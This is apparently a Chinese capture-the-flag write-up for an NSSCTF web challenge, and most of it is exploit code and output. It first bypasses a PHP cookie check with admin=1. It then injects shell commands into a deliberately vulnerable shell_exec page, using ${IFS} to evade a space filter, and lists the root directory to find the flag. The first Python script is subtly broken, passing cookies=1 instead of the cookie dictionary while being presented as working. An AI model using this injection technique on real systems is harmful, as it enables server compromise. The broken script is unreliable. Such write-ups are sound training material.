<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) {
include "../next.php";
} else
echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!直接传递cookies admin 为1 就可以
import requests
url = "http://node5.anna.nssctf.cn:29857/"
cookies = {
'admin': "1"
}
resp = requests.post(url=url,cookies=1)
print(resp.text)
得到rasalghul.php
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/ /", $ip)) {
die('nonono');
}
$a = shell_exec($ip);
echo $a;
}
?>正则过滤空格 ${IFS}可绕过 ${IFS} - Linux 下的空白字符
import requests
param = "ls${IFS}/"
url = f"http://node5.anna.nssctf.cn:29857/rasalghul.php?url={param}"
resp = requests.get(url=url)
print(resp.text)flag为flllllaaaaaaggggggg
boot
dev
etc
flllllaaaaaaggggggg
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
结束